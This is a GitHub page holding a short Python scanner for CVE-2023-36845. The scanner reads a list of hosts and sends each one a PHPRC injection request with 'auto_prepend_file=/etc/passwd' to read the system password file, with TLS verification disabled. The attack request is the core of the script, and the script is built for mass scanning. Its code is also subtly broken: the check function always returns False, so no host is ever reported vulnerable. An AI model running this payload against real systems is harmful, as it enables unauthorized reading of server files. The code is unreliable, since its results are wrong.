-
Notifications
You must be signed in to change notification settings - Fork 13
/
CVE-2023-36845.py
42 lines (35 loc) · 1.38 KB
/
CVE-2023-36845.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python3
import requests
import argparse
import urllib3
urllib3.disable_warnings()
def check_vulnerability(url):
try:
response = requests.post(url, data={'auto_prepend_file': '/etc/passwd'}, verify=False, timeout=5)
if 'root:' in response.text:
is_vuln = True
else:
is_vuln = False
except requests.RequestException as e:
pass
return False
def main():
parser = argparse.ArgumentParser(description='Check vulnerability of domains/IPs in a file.')
parser.add_argument('-f', '--file', type=str, required=True, help='Input file containing domains or IPs')
parser.add_argument('-o', type=str, required=True, help='Output file to write results')
args = parser.parse_args()
with open(args.file, 'r') as f, open(args.o, 'w') as out:
for host in f:
host = host.strip()
if host:
is_vuln = False
for schema in ['http://', 'https://']:
url = f"{schema}{host}/?PHPRC=/dev/fd/0"
if check_vulnerability(url):
is_vuln = True
break
result = f"{host} is vulnerable to CVE-2023-36845" if is_vuln else f"{host} is not vulnerable to CVE-2023-36845"
out.write(result + '\n')
print(result)
if __name__ == '__main__':
main()